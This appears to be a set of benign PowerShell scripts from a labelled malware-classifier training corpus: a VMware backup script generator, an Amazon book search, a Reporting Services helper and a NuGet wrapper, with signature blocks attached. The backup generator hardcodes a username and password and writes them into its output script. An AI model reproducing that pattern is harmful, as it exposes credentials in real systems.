Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIN2SLf5Cq/sUdjzDA2tgNX0n # YKrnCdzLriIcf2nAv7K9MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAmRUEN1tZbigmG0769C0XDXeuCOOud6Tv9I3OBlTy9Zo7q4oB42FTb1g0 # GESF47wN5CCtBHPLtHXFAnZs2b/W7uTJfZbwq1e9FRRaYSalgPjbdMCbWf5dfD8c # sBSIbnpzL/0nBz3JitaQVfoOs+nrmSW/oPX0/i/7Kw7QsmNTrza3fQy123ZilyXJ # VWfMSuEhPX3fhD1XDUk/o1SAIuXmP71wD0cjhh9KcfK5hWgPOcYQH4q64DMV5wN3 # Hod8eZynpLurIKNL3inhu895EkJVW92obd2/EBW1/dLuXtyDw2/IzjA8iORIZz8G # xqwBUbsZJIIQ/SITRibPfUJ/P/3I76GCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAPFDDZQxIDoBSepKWxostKB5xyOAyuP2/ZHIosh35XMwIGZbqk0SEa # GBMyMDI0MDIxMjE0MDg1MS4wMjZaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OkZDNDEtNEJENC1EMjIwMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzI1WhcNMjUwMTEwMTkwNzI1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpGQzQxLTRC # RDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALVjtZhV+kFmb8cKQpg2mzis # DlRI978Gb2amGvbAmCd04JVGeTe/QGzM8KbQrMDol7DC7jS03JkcrPsWi9WpVwsI # ckRQ8AkX1idBG9HhyCspAavfuvz55khl7brPQx7H99UJbsE3wMmpmJasPWpgF05z # ZlvpWQDULDcIYyl5lXI4HVZ5N6MSxWO8zwWr4r9xkMmUXs7ICxDJr5a39SSePAJR # IyznaIc0WzZ6MFcTRzLLNyPBE4KrVv1LFd96FNxAzwnetSePg88EmRezr2T3HTFE # lneJXyQYd6YQ7eCIc7yllWoY03CEg9ghorp9qUKcBUfFcS4XElf3GSERnlzJsK7s # /ZGPU4daHT2jWGoYha2QCOmkgjOmBFCqQFFwFmsPrZj4eQszYxq4c4HqPnUu4hT4 # aqpvUZ3qIOXbdyU42pNL93cn0rPTTleOUsOQbgvlRdthFCBepxfb6nbsp3fcZaPB # fTbtXVa8nLQuMCBqyfsebuqnbwj+lHQfqKpivpyd7KCWACoj78XUwYqy1HyYnStT # me4T9vK6u2O/KThfROeJHiSg44ymFj+34IcFEhPogaKvNNsTVm4QbqphCyknrwBy # qorBCLH6bllRtJMJwmu7GRdTQsIx2HMKqphEtpSm1z3ufASdPrgPhsQIRFkHZGui # hL1Jjj4Lu3CbAmha0lOrAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQURIQOEdq+7Qds # lptJiCRNpXgJ2gUwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAORURDGrVRTbnulf # sg2cTsyyh7YXvhVU7NZMkITAQYsFEPVgvSviCylr5ap3ka76Yz0t/6lxuczI6w7t # Xq8n4WxUUgcj5wAhnNorhnD8ljYqbck37fggYK3+wEwLhP1PGC5tvXK0xYomU1nU # +lXOy9ZRnShI/HZdFrw2srgtsbWow9OMuADS5lg7okrXa2daCOGnxuaD1IO+65E7 # qv2O0W0sGj7AWdOjNdpexPrspL2KEcOMeJVmkk/O0ganhFzzHAnWjtNWneU11WQ6 # Bxv8OpN1fY9wzQoiycgvOOJM93od55EGeXxfF8bofLVlUE3zIikoSed+8s61NDP+ # x9RMya2mwK/Ys1xdvDlZTHndIKssfmu3vu/a+BFf2uIoycVTvBQpv/drRJD68eo4 # 01mkCRFkmy/+BmQlRrx2rapqAu5k0Nev+iUdBUKmX/iOaKZ75vuQg7hCiBA5xIm5 # ZIXDSlX47wwFar3/BgTwntMq9ra6QRAeS/o/uYWkmvqvE8Aq38QmKgTiBnWSS/uV # PcaHEyArnyFh5G+qeCGmL44MfEnFEhxc3saPmXhe6MhSgCIGJUZDA7336nQD8fn4 # y6534Lel+LuT5F5bFt0mLwd+H5GxGzObZmm/c3pEWtHv1ug7dS/Dfrcd1sn2E4gk # 4W1L1jdRBbK9xwkMmwY+CHZeMSvBMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpG # QzQxLTRCRDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAFpuZafp0bnpJdIhfiB1d8pTohm+ggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOl0S1kwIhgPMjAyNDAyMTIxNTQ2MzNaGA8yMDI0MDIxMzE1NDYzM1owdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6XRLWQIBADAHAgEAAgIVwzAHAgEAAgIUTzAKAgUA # 6XWc2QIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAKSvdq5/OwSqLipXDPR/ # fz5CiLbm0lCxv+PjDUqfK5ccPWEVkKsD9zmiB4N1ZQarjww5WUro+QdoUzSzV/Ly # OaxhyB8c2JwDLLMQK8JyHWefD6cG4cvgYDg5iEzioerBrjSnrGxsb3qVV0n31Fhc # Z9Hh71O9RocFcjpVHRSVEF7MMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgfcbRxDvDL+x718hq5mDmmW8NwBh7bv3l2ZbzZJDjOPswgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCAriSpKEP0muMbBUETODoL4d5LU6I/bjucIZkOJCI9/ # /zCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB4pmZ # lfHc4yDrAAEAAAHiMCIEII1oQoIqDDF/dls2LazpjkRTP0GoZvbNELQJtb8XKdao # MA0GCSqGSIb3DQEBCwUABIICADR0/a5v1+VmcfVvu3NokHV60G2ODsSue5zKlcFP # bOZ2RB/2eYKHzFIeyeMmrO7Ybs8NwXhw0Sl5G/U8wKfi3SHYVHqKzm8MWIKQ5gDf # aDa9kftHfanlAKH8zv1/YPt5rNfmsX9TCeioE4TAJFneqPhD6cQVK0Wxt48DQQka # NtO3Nm9Vxp7dLpS5nsz4DR33EY6ZvO51yfHE8/0T+B7clZwCIyQhvWzqed1L8aoq # r610REDXji/s33thYEwhZ0mAep2693Chru3Sn4u24vQAiLZmB5vvJKfvvu0LxMr/ # 8vzZ95Pyk5RYJjfdgsmEoTELll4oETBVS53GhCVis9ozSYeyFTmAyAtnxPRp/Qgc # Oh8V8M+eQrmO21H+54lpQ03j9NaYm9o0Hs7FO+iJRJrW9AH7/EYEtwAQHdvDrm8j # ZLRv87IPuyK6fofcv2smORV528zjgMpozVSObYP0Z9/p+mFgWs+kLVWVcpz4HHCo # xbXUSm0UcM7rB45DUsiDn7c7K/wYDvii/z81dMdf8/JMO5D+/GMWLMyfM48JpWVf # OmbX64KO6/w9AMfkCQZRvxL3NWEZdFJQuxNLQ0Wfmar4xYcVZTukklv1j5/fPTI/ # tYf1KO+PpIPgHOeqrNy537hOJBQP2BlE8YFXCUhhrYTbXfLu4uguoAWIWAzBTgng # WMZW # SIG # End signature block
combined_dataset/train/non-malicious/vibackup-lx.ps1
vibackup-lx.ps1
Param ( $viServer, $bakVM, $lxDest ) #region check if (!$viServer) { $viServer = Read-Host -Prompt "VI Server " } if (!$bakVM) { $bakVM = Read-Host -Prompt "VM to Backup " } if (!$lxDest) { $lxDest = Read-Host -Prompt "Backup Path (ex. /srv/backup) " } #endregion #region globalvars $encoding = "OEM" $version = "0.5" $scriptout = @() #endregion #region stkmvars $viUser = "uusdumVMWARE" $viPass = "1qayxsw2" #endregion Write-Host "viBackup Script Generator - " $version Write-Host "--------------------------------------------" if (($vmCon = Connect-VIServer -Protocol https $viServer) -eq "") { exit } $vm = Get-VM $bakVM -Server $vmCon -ErrorAction SilentlyContinue if (!$vm) { Write-Host "No VM found." Write-Host "Enter the Display Name from the VI Center:" -NoNewline $tvm = Read-Host if (!($vm=Get-VM $tvm -ErrorAction SilentlyContinue)) { return $false exit } Write-Host "You have entered 2 different Names. Please check that the VMX and the VM Name are the same!" Write-Host -ForegroundColor yellow "Entered VMX Name: {$bakVM}" Write-Host -ForegroundColor yellow "Entered VM Name: {$tvm}" Write-Host -ForegroundColor yellow "Returned VM Name: {$vm}" Write-Host -ForegroundColor yellow "IS THIS CORRECT (Yes/No)?:" -NoNewline $sure = Read-Host if ($sure -ne "yes") { exit } } #check Snapshots if ((Get-Snapshot -VM $vm -Server $vmCon)) { Write-Host "VM has Snapshots. No Backup possible." return $false exit } #write script $scriptname = $vm.name + ".sh" $vmname = $vm.Name $vmhost = $vm.Host #generate Text $header = "#!/bin/bash" $user = "USER=`"${viUser}`"" $pass = "PASS=`"${viPass}`"" $dest = "DEST=`"${lxDest}`"" $lxVM = "VM=`"${vmname}`"" #region writefile $scriptout += $header $scriptout += $user $scriptout += $pass $scriptout += $dest $scriptout += $lxvm $scriptout += "" $scriptout += "BKUP=``vmrun -h https://${viserver}/sdk -u `${USER} -p `${PASS} list | grep `${VM}`` " $scriptout += "SNAPCHECK=``vmware-cmd -H ${viserver} -T ${vmhost} -U `${USER} -P `${PASS} `"`${BKUP}`" hassnapshot`` " $scriptout += "if [ `"`$SNAPCHECK`" != `"hassnapshot () =`" ]; then `n echo 'VM has a Snapshot. Arborting...' `n exit `n fi" $scriptout += "vmrun -T esx -h https://${viserver}/sdk -u `${USER} -p `${PASS} snapshot `"`${BKUP}`" vmBackup" # Hard Disk foreach ($hd in $vm.Harddisks) { $hdname = $hd.Filename $vifs = "vifs --server ${viserver} --dc 'KM' --username `${USER} --password `${PASS} --get `"``echo $hdname | sed 's/.vmdk/-flat.vmdk/g'```" `${DEST}/`${VM}.vmdk " $scriptout += $vifs } $scriptout += "vmrun -T esx -h https://${viserver}/sdk -u `${USER} -p `${PASS} deleteSnapshot `"`${BKUP}`" vmBackup" $scriptout | Out-File $scriptname -Encoding $encoding #endregion Write-Host "Finished" Write-Host "Don't forget to convert the script under *nix/Linux with dos2unix!"
combined_dataset/train/non-malicious/Find-AmazonBook.ps1
Find-AmazonBook.ps1
## Requires HttpRest http://poshcode.org/691 ## Add-Module HttpRest ##Or:## . HttpRest.ps1 ## YOU MUST Provide an Amazon Web Services key (AWSKey) and a $Book title #################################################################################################### Set-HttpDefaultUrl "http://ecs.amazonaws.com/onca/xml" FUNCTION Search-Books { PARAM( [string]$Book, [string]$AWSKey, [string]$outFile, [string]$inputDelim = ",", [int]$Count = 1 ) BEGIN { if($Book -and $(Test-Path $Book)) { return Get-Content $Book | Search-Books } elseif($Book){ $Book | Search-Books } $params = @{ Service="AWSECommerceService" AWSAccessKeyId=$AWSKey Operation="ItemSearch" SearchIndex="Books" } } PROCESS { if($_){ $book=$_ $bk = $book.Split($inputDelim) $params.Title = $bk[0].Trim() if($bk[1]) { $params.Author = $bk[1].Trim() } else { $params.Remove("Author") } $items = Invoke-Http GET -with $params | Receive-Http Xml "//*[local-name() = 'Item']" | Select Asin, DetailPageUrl, @{n="Title";e={$_.ItemAttributes.Title}}, @{n="Author";e={$_.ItemAttributes.Author}} -First $Count if($outFile) { ConvertTo-CSV -io $items | Add-Content -Path $outFile } else { $items } }} }
combined_dataset/train/non-malicious/727.ps1
727.ps1
function Set-RsDataSetReference { [CmdletBinding(SupportsShouldProcess = $true, ConfirmImpact = 'Medium')] param ( [Alias('ItemPath')] [Parameter(Mandatory = $true)] [string[]] $Path, [Parameter(Mandatory = $true)] [string] $DataSetName, [Parameter(Mandatory = $true)] [string] $DataSetPath, [string] $ReportServerUri, [Alias('ReportServerCredentials')] [System.Management.Automation.PSCredential] $Credential, $Proxy ) Begin { $Proxy = New-RsWebServiceProxyHelper -BoundParameters $PSBoundParameters } Process { foreach ($item in $Path) { if ($PSCmdlet.ShouldProcess($item, "Set datasource's DataSet $DataSetName to $DataSetPath")) { Write-Verbose "Processing: $item" try { $dataSets = $Proxy.GetItemReferences($item, "DataSet") } catch { throw (New-Object System.Exception("Failed to retrieve item references from Report Server for '$item': $($_.Exception.Message)", $_.Exception)) } $dataSetReference = $dataSets | Where-Object { $_.Name -eq $DataSetName } | Select-Object -First 1 if (-not $dataSetReference) { throw "$item does not contain a dataSet reference with name $DataSetName" } $proxyNamespace = $dataSetReference.GetType().Namespace $dataSetReference = New-Object "$($proxyNamespace).ItemReference" $dataSetReference.Name = $DataSetName $dataSetReference.Reference = $DataSetPath Write-Verbose "Set dataSet reference '$DataSetName' of item $item to $DataSetPath" $Proxy.SetItemReferences($item, @($dataSetReference)) } } } } New-Alias -Name Set-RsDataSet -Value Set-RsDataSetReference -Scope Global
combined_dataset/train/non-malicious/sample_50_31.ps1
sample_50_31.ps1
# # This private script adds $InterfaceType members to $psObject which invokes on $wrappedObject # Param( $psObject, $wrappedObject, [Type]$InterfaceType ) function GetInvoker { Param( $Target, $Method ) if ($Method.IsGenericMethodDefinition) { return { $t = $Target $m = $Method.MakeGenericMethod($args) if (!$m.GetParameters()) { return $m.Invoke($t, @()) } $o = New-Object PSObject Add-Member -InputObject $o -MemberType ScriptMethod -Name Invoke -Value { [NuGetConsole.Host.PowerShell.Implementation.PSTypeWrapper]::InvokeMethod($t, $m, $args) }.GetNewClosure() return $o }.GetNewClosure() } return { [NuGetConsole.Host.PowerShell.Implementation.PSTypeWrapper]::InvokeMethod($Target, $Method, $args) }.GetNewClosure() } $InterfaceType.GetMembers() | %{ $m = $_ $getter = $null $setter = $null if ($m.MemberType -eq [System.Reflection.MemberTypes]"Property") { if ($m.CanRead) { $getter = GetInvoker $wrappedObject $m.GetGetMethod() } if ($m.CanWrite) { $setter = GetInvoker $wrappedObject $m.GetSetMethod() } $prop = New-Object Management.Automation.PSScriptProperty $m.Name, $getter, $setter $psObject.PSObject.Properties.Add($prop) } elseif (!$m.IsSpecialName -and ($m.MemberType -eq [System.Reflection.MemberTypes]"Method")) { $invoker = GetInvoker $wrappedObject $m $method = New-Object Management.Automation.PSScriptMethod $m.Name, $invoker $psObject.PSObject.Methods.Add($method) } } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCD1ecp2zeBRUg/7 # OANR53ZDEwOwZirhYRXN5XvpoxuVmaCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 